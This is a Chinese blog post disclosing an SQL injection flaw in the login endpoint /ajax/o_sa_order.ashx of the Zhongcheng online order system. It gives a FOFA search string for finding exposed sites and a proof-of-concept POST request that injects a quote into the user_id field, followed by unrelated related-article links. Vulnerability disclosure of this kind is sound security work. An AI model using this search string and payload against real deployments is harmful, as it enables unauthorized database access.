众诚网上订单系统存在SQL注入漏洞

最新推荐文章于 2024-10-16 11:02:39 发布
最新推荐文章于 2024-10-16 11:02:39 发布
阅读量175 收藏
点赞数 3
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141285764
版权

漏洞描述:

与传统订货方式相比,首先网络订货打破了时间和空间的限制,客户可以在订货周期内的任意时间和任何地点,通过网上订货网站自主选择品牌,提报订货需求,完成订购业务。众诚网上订单系统存在SQL注入漏洞

FOFA:title="欢迎使用众诚网上订单系统"

 漏洞复现:

POC:

POST /ajax/o_sa_order.ashx HTTP/1.1
Host: 
Content-Length: 42
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/login.htm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASPSESSIONIDCCDSBQSQ=HJGLDGEAPAHNMJLCFFEMPOFL; __session:0.28302654601560717:=http:
Connection: keep-alive

type=login&user_id=admin'&user_pwd=1111111

 bp返回包语法错误

sqlmap:

 

摸金校尉-马
关注
众诚网上订单系统o_sa_order存在SQL注入漏洞
weixin_43167326的博客
09-03 651
众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞,攻击者可获取数据库敏感信息。
众诚网上订单系统 o_sa_order.ashx SQL注入漏洞复现
网安小白
09-07 512
众诚网上订单系统通过集成互联网技术和先进的管理思想,为生产制造企业、多分销渠道的批零兼营、各类商贸批发业务提供了一站式的订单管理解决方案。该系统支持电脑PC、平板、手机APP同步操作,实现了订单、商品、客户、资金、信息、支付、物流和电子商务的全方位连接,极大地提升了企业的运营效率和管理水平。众诚网上订单系统 o_sa_order.ashx 存在SQL注入漏洞
HW漏洞威胁情报第三十八天|HW情报
weixin_43167326的博客
08-29 751
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
众城优选系统开发功能和开发源码分享
dv15528175269的博客
08-01 427
最近新开发了一套众城优选系统,其主要功能有预约系统,支付系统,电商系统,会员系统,抢购系统等等,众城优选是一款健堂生物,东澳阿胶 ,众城集团联合孵化的电商平台。在开发的过程中,需要注意的是预约系统和抢购系统,用户参与抢购,需要先进行预约;用户预约之后是需要进行抢购的,这两个功能是相辅相成的,缺一不可。.........
众诚团队博客正式上线
众诚
04-20 194
在这里可以方便的上传下载专业资料在这里可以方便的分享代码资源所以我选择了这里安放我们的博客
坯布检验管控系统
weixin_30767921的博客
01-19 117
织造后整理/检验车间/坯布检验/usegear 坯布质检管控系统 (www.usegear.com.cn) 制定生产计划,实时了解生产进度 计划工单是整个系统的基础: 根据客户订单建立相对应的计划工单,也可以直接导入已有生产计划单。 生产看板: 指定时段指定工单中,各个工序坯布的实际长度数量和生产分布状况,从而反应订单生产进度和各个工序生产进度实时状况。 ...
众诚保险2019净利近5000万翻三倍,却仍难控车险成本承保亏损超6000万
LeiSheCaiJing的博客
04-08 366
众诚保险2019净利近5千万翻三倍,仍难控车险成本承保亏损超6千万 来源 | 蓝鲸insurance 作者 | 蓝鲸insurance 原标题 | 众诚保险2019净利近5000万翻三倍,却仍难控车险成本承保亏损超6000万 近日,新三板挂牌公司众诚保险(835987)披露2019年年报,揭开非上市险企年报披露序幕。2019年,众诚保险实现保费收入近2成的增幅,并在2018年首度盈利后,实现净利润...
值得收藏!脑科学、脑机接口领域白皮书、研究报告汇总
脑机接口社区
12-31 1626
2021年全球脑科学发展报告脑科学是生命科学最尖端、最前沿的领域,也是人类最难攻克的“科学堡垒”之一。但脑科学却是诸多前沿科技发展的基础,如人工智能、脑机接口、信息科学、仿生科学等,也是医...
利用脑机接口从鸟的脑电波中重现鸟唱歌声
脑机接口社区
06-30 374
神经科学研究人员创建脑机接口(BCI)或脑机接口(BMI),目的是使用大脑恢复受损的人体运动功能。加州大学圣地亚哥分校(Universityof California, San Diego...
众诚商业管理系统破解版
07-23
众诚商业管理系统破解版!
众诚智库】2023医疗机器人产业发展报告.pdf
01-17
众诚智库】2023医疗机器人产业发展报告
众诚数据处理
11-20
您电脑里面安装的最低版的CAD,高于CAD2010版。这时您可以到软件的同目录下查看是否有一个“临时文件当CAD无法打开时用myscr.scr”如果有,直接打开cad 把它拖进去去就也可以完成展点
众诚能源:2019年度报告.PDF
05-22
众诚能源:2019年度报告.PDF
Spring Boot视频网站:安全与可扩展性设计
最新发布
2401_85702623的博客
10-16 1098
本次程序开发选用的数据库管理工具是MySQL数据管理工具,使用它存放数据也需要创建程序对应的数据库文件,并命名刚创建的数据库文件,有了数据库也需要创建各种数据表来充实数据库,在数据表的创建中,不仅需要对数据表命名,也需要对数据表的字段进行设计,包括每个数据表里面需要设置的字段名称,字段对应的数据类型信息,字段的主键设置这个也是不可缺少的,因为每个数据表里面的主键就是标记着这个数据表跟其他数据表相区分的唯一标志。addtime timestamp 否 CURRENT_TIMESTAMP 创建时间。
Gin框架操作指南08:日志与安全
技术卷的博客
10-16 1005
本节演示日志与安全相关的API,包括定义路由日志的格式;如何记录日志;安全页眉;使用BasicAuth中间件;使用HTTP方法。
CTFHUB技能树之HTTP协议——响应包源代码
weixin_73049307的博客
10-13 651
点击“开始”没有抓取到报文,先看看网页源代码是什么情况。居然直接给出flag了,不知道这题的意义何在。是个贪吃蛇小游戏,看不出来有什么特别的地方。
[漏洞挖掘与防护] 04.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析
杨秀璋的专栏
10-16 209
上一篇文章详细介绍了WinRAR漏洞(CVE-2018-20250),并复现了该漏洞和讲解了恶意软件自启动劫持原理。这篇文章将分享Windows系统漏洞,通过5次Shift漏洞重改CMD,最终实现修改计算机密码并启动计算机,其思路还是比较有趣的,希望对您有所帮助!基础性文章,希望对入门的同学有帮助。
泰安众诚矿用移动变电站操作与维修手册
"泰安众诚矿用移动变电站的培训教材,涵盖了高压真空开关、低压侧保护箱、真空可逆电磁起动器、可逆绞车控制组合开关和负荷中心组合开关的设计原理、故障排查与维修知识。" 这篇培训教材详细介绍了泰安市众诚矿山...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值